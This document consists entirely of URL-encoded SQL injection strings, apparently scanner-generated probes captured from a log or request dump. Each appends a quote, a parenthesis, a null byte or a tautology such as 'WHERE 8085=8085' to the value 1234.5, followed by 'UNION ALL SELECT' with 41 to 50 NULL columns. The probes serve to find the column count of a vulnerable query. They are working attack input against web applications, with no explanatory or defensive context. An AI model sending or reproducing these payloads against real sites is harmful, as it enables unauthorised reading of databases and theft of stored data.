1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%25%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%00%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20WHERE%208085%3D8085%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20WHERE%205181%3D5181%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20WHERE%201540%3D1540%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20WHERE%209351%3D9351%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20WHERE%203912%3D3912%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20WHERE%206800%3D6800%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20WHERE%203811%3D3811%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20WHERE%207148%3D7148%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20WHERE%206127%3D6127%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%27%29%20WHERE%208343%3D8343%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20WHERE%204620%3D4620%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20WHERE%204217%3D4217%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20WHERE%204112%3D4112%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20WHERE%204980%3D4980%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20WHERE%202610%3D2610%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20WHERE%202718%3D2718%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20WHERE%201546%3D1546%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20WHERE%209723%3D9723%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20WHERE%205325%3D5325%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%22%29%20WHERE%205188%3D5188%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 1234.5%29%20WHERE%204654%3D4654%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%23 